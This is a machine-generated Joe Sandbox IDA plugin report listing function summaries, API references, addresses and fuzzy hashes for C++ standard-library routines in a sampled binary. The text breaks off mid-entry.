                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: $s$bad cast
                                  • API String ID: 1676052248-46880872
                                  • Opcode ID: 0748360e88f843926f8c9301fcffb5f6df90545b1e5baa60d920f059cbb9958d
                                  • Instruction ID: 1a9006e3bd87e226f6bc65dbfa9752c7e2ad6cece43d362f7ef8d7d1ba3134bc
                                  • Opcode Fuzzy Hash: 0748360e88f843926f8c9301fcffb5f6df90545b1e5baa60d920f059cbb9958d
                                  • Instruction Fuzzy Hash: E601A131900209ABDB05EBB4D856AFE7727AF40721F14052DF9107B2D1DF78AA458799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660B5E
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660B68
                                  • int.LIBCPMT ref: 00660B7F
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00660BA2
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660BB6
                                  • __CxxThrowException@8.LIBCMT ref: 00660BC4
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660BDA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: Ts$bad cast
                                  • API String ID: 1676052248-3903122221
                                  • Opcode ID: 7f94dd489577bf17cb85d4fe765de91afa4fa519e0d327fd39741d0fbe8d3516
                                  • Instruction ID: af4e60c12aeaf962f4c0288f3940a1d10f9be851f33365a693c0c0bec59fc542
                                  • Opcode Fuzzy Hash: 7f94dd489577bf17cb85d4fe765de91afa4fa519e0d327fd39741d0fbe8d3516
                                  • Instruction Fuzzy Hash: CC010C319002099BCB04EBB0C843AFE7737AF80720F24452DF9117B2D0CF78AA458B99
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661357
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661361
                                  • int.LIBCPMT ref: 00661378
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 0066139B
                                  • std::bad_exception::bad_exception.LIBCMT ref: 006613AF
                                  • __CxxThrowException@8.LIBCMT ref: 006613BD
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 006613D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: bad cast$s
                                  • API String ID: 1676052248-2723258968
                                  • Opcode ID: afb5ecc2575a5adfea31e7c66913a9c456e5392f4d6ee640d794f469bcc7f808
                                  • Instruction ID: 57e56e6d8e0f1695fc427f6be8448a9c063f787741c9c188896c8afade79b362
                                  • Opcode Fuzzy Hash: afb5ecc2575a5adfea31e7c66913a9c456e5392f4d6ee640d794f469bcc7f808
                                  • Instruction Fuzzy Hash: 70018B319002199BCB05EBA0D852AFE7727AF81721F18061DF9117B2D1DF78AA059798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660BFB
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660C05
                                  • int.LIBCPMT ref: 00660C1C
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • numpunct.LIBCPMT ref: 00660C3F
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660C53
                                  • __CxxThrowException@8.LIBCMT ref: 00660C61
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660C77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: 8s$bad cast
                                  • API String ID: 1289509941-1317860649
                                  • Opcode ID: 061a030e41178a4658ab4cc0ba54e9df5a3fa119c5915864ca55eff7afdabd43
                                  • Instruction ID: 4f2765b0051dfa8d7b0567d96e760eeb71f69e2781326fe1bb697f60c6780371
                                  • Opcode Fuzzy Hash: 061a030e41178a4658ab4cc0ba54e9df5a3fa119c5915864ca55eff7afdabd43
                                  • Instruction Fuzzy Hash: 3501CC319002099BDB05EBB0C853AFE7737AF40720F24062DF9107B2D1CF78AA058798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660C98
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660CA2
                                  • int.LIBCPMT ref: 00660CB9
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • messages.LIBCPMT ref: 00660CDC
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660CF0
                                  • __CxxThrowException@8.LIBCMT ref: 00660CFE
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660D14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: s$bad cast
                                  • API String ID: 2525416601-459790195
                                  • Opcode ID: a24ecfdb47ee5fa40ea1ea6c63db1dd06a1527edb559708be50f65575bdce32d
                                  • Instruction ID: 4a612209761c11d6562e52499b9fa74223c979907fb66fed0c24bf1a05f28b51
                                  • Opcode Fuzzy Hash: a24ecfdb47ee5fa40ea1ea6c63db1dd06a1527edb559708be50f65575bdce32d
                                  • Instruction Fuzzy Hash: CA01CC319002199BDB05EFB0D852AFE7727AF80721F24062DF9117B2D1DF78AA058799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660D35
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660D3F
                                  • int.LIBCPMT ref: 00660D56
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00660D79
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660D8D
                                  • __CxxThrowException@8.LIBCMT ref: 00660D9B
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660DB1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: Hs$bad cast
                                  • API String ID: 1676052248-2766358124
                                  • Opcode ID: c77c88663a81961ac4b4bcdd1a7f8541330bf35f75c85463d7daf81c1b7accbe
                                  • Instruction ID: 7eb601f0c4556ecb9a502d90031654fa5cc79b68905a21576a1b12cdfa35a103
                                  • Opcode Fuzzy Hash: c77c88663a81961ac4b4bcdd1a7f8541330bf35f75c85463d7daf81c1b7accbe
                                  • Instruction Fuzzy Hash: 9D01C0329002199BDB45EBF0C842AFE7727AF41720F24062DF9107B2D1CF78AA458798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660DD2
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660DDC
                                  • int.LIBCPMT ref: 00660DF3
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00660E16
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660E2A
                                  • __CxxThrowException@8.LIBCMT ref: 00660E38
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660E4E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: Ls$bad cast
                                  • API String ID: 1676052248-3176122743
                                  • Opcode ID: c9b3c347da9064dbf25a681a4b6107bdfb1519369fd3a76915e202b1ff75c44d
                                  • Instruction ID: 17ced3e44a39ed584e9c3629aaf477a4db3253c931fc3b638ff4d1c2738002ff
                                  • Opcode Fuzzy Hash: c9b3c347da9064dbf25a681a4b6107bdfb1519369fd3a76915e202b1ff75c44d
                                  • Instruction Fuzzy Hash: C501C0319002199BDB05EBB0D842AFEB737AF40720F14092DF9107B2D1CF79AE058B98
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661DBE
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661DC8
                                  • int.LIBCPMT ref: 00661DDF
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • moneypunct.LIBCPMT ref: 00661E02
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661E16
                                  • __CxxThrowException@8.LIBCMT ref: 00661E24
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661E3A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: (s$bad cast
                                  • API String ID: 2090539961-675203397
                                  • Opcode ID: 4ce269fcd79ae2fc4ee66c9133573e6bea539d8048f828f84ebed05782fd9282
                                  • Instruction ID: 6f0b6934e5ed281edfa4cf609e25540507ec667aa5cb600c644da0019951ea24
                                  • Opcode Fuzzy Hash: 4ce269fcd79ae2fc4ee66c9133573e6bea539d8048f828f84ebed05782fd9282
                                  • Instruction Fuzzy Hash: 7101AD319002199BCB05EBB0D842AFE7727BF81721F28052DF9107F2D1DF78AA059799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660F0C
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660F16
                                  • int.LIBCPMT ref: 00660F2D
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00660F50
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660F64
                                  • __CxxThrowException@8.LIBCMT ref: 00660F72
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660F88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: Ds$bad cast
                                  • API String ID: 1676052248-2383861569
                                  • Opcode ID: 65b0fba08a841e94c489b1cfa6f24ea9cd175dca165af7a6776295212673ef5b
                                  • Instruction ID: b932a4bdbba5e2849cce7b04d7fd933dd7153ef9357b4ca52374f743421ad7ab
                                  • Opcode Fuzzy Hash: 65b0fba08a841e94c489b1cfa6f24ea9cd175dca165af7a6776295212673ef5b
                                  • Instruction Fuzzy Hash: 3301C031900219ABDB05EBB0D942AFE7737AF40721F14052DF9117B2D1DF78AA858799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 006697E4
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 006697EE
                                  • int.LIBCPMT ref: 00669805
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • collate.LIBCPMT ref: 00669828
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066983C
                                  • __CxxThrowException@8.LIBCMT ref: 0066984A
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00669860
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: 4s$bad cast
                                  • API String ID: 2346505839-1685677060
                                  • Opcode ID: 3c3678b4abce1eba8989befd7aa947ca3ac5d11e41ebefd34c2d17f5ae732061
                                  • Instruction ID: b33bef0a32c6fd70ad8b26ba0ab6a364ec30e67ea7d28104bc76a1762adaa616
                                  • Opcode Fuzzy Hash: 3c3678b4abce1eba8989befd7aa947ca3ac5d11e41ebefd34c2d17f5ae732061
                                  • Instruction Fuzzy Hash: 7101C0319002199BCB05EBB1D852AFD773BAF41720F24091DF9107B2D1CF78AA058BA9
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660FA9
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660FB3
                                  • int.LIBCPMT ref: 00660FCA
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00660FED
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661001
                                  • __CxxThrowException@8.LIBCMT ref: 0066100F
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661025
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: <s$bad cast
                                  • API String ID: 1676052248-1461746226
                                  • Opcode ID: abc34c42f05339c3f227ebf6f20f1280bb8bf193bd601c91fa1db07e1ce57564
                                  • Instruction ID: 69d397a1a3d07ca486b5951f361a88448deaf4e48f805ed3280a4ab38a2feead
                                  • Opcode Fuzzy Hash: abc34c42f05339c3f227ebf6f20f1280bb8bf193bd601c91fa1db07e1ce57564
                                  • Instruction Fuzzy Hash: 2801AD329002099BDF45EBA0C852AFE7737AF40720F24051DF9107B2D1DF78AA8587A8
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661F95
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661F9F
                                  • int.LIBCPMT ref: 00661FB6
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • moneypunct.LIBCPMT ref: 00661FD9
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661FED
                                  • __CxxThrowException@8.LIBCMT ref: 00661FFB
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00662011
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: @s$bad cast
                                  • API String ID: 2090539961-2545571930
                                  • Opcode ID: 647d6d88b47cbe7f633e968144cf04d1b336e310802a83c86678a4079ded0725
                                  • Instruction ID: b2571e3727f6e051780bf42adb46a433ff3783e34a134af3d70ae272ba740d83
                                  • Opcode Fuzzy Hash: 647d6d88b47cbe7f633e968144cf04d1b336e310802a83c86678a4079ded0725
                                  • Instruction Fuzzy Hash: 57016D3190021A9BCB05EBB0D857AFE7727AF40721F24051DF9107B2D1DF78AA459799
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00426521
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • _memmove.LIBCMT ref: 004265A1
                                  • _memmove.LIBCMT ref: 004265C1
                                  • _memmove.LIBCMT ref: 00426625
                                  • _memmove.LIBCMT ref: 00426694
                                  • _memmove.LIBCMT ref: 004266B3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                  • String ID: u6A"$vector<T> too long
                                  • API String ID: 4034224661-1315088524
                                  • Opcode ID: fd12ecff2559e19210882c1212e8c891f829e42ea673c1630522b0646557dea9
                                  • Instruction ID: e5f475aa06b6f66695a792dac7957df42c754e219a437cd28c0919f3fa743700
                                  • Opcode Fuzzy Hash: fd12ecff2559e19210882c1212e8c891f829e42ea673c1630522b0646557dea9
                                  • Instruction Fuzzy Hash: 5A61D872B001159FCB08CF68D8859AE77A5EF94310F59C66EEC06DB348E634EE04CB94
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041D2BD
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041D2E0
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0041D364
                                  • __CxxThrowException@8.LIBCMT ref: 0041D372
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0041D385
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041D39F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: F%@$bad cast
                                  • API String ID: 2427920155-3434137552
                                  • Opcode ID: aea368b7cbbc8cd1210328c9585d07067fb43aaa5f9bfa8f5e18812f550e7f26
                                  • Instruction ID: 62cc12de31fcd688fc302111fd7803b93f00061f61340484f7a59fcb2b0fb051
